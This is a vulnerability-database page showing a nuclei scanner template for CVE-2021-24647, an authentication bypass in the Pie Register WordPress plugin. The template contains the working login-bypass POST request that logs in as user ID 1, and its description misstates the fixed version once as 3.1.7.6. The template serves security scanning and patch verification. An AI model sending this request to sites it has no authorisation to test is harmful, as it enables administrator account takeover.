Lucene search
K

Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Pie Register plugin <3.7.1.6 - Unauthenticated Arbitrary Login fla

Related
Refs
Code
id: CVE-2021-24647

info:
  name: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
  author: DhiyaneshDK
  severity: high
  description: |
    The Registration Forms  User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.1.7.6 has a flaw in the social login implementation, allowing unauthenticated attacker to login as any user on the site by only knowing their user ID or username
  impact: |
    An attacker can gain unauthorized access to the WordPress site and potentially compromise sensitive information.
  remediation: Fixed in version 3.7.1.6
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24647
    - https://github.com/RandomRobbieBF/CVE-2021-24647
    - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2021-24647
    cwe-id: CWE-287
    epss-score: 0.08377
    epss-percentile: 0.94296
    cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: genetechsolutions
    product: pie_register
    framework: wordpress
  tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions,vkev,vuln

http:
  - raw:
      - |
        GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body_1, "pieregister")'
          - 'contains(body_3, "Username") && contains(body_3, "email-description")'
        condition: and
# digest: 4b0a00483046022100e1f2b1508c1839057c58d4339da63fdf169a85cb368cfb8fb4b33a4d335824f0022100badc6a812baed70dd8fe4f698941645e388f3c7229cf23bd4c08951843494cad:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.8
CVSS 3.18.1
EPSS0.08377
33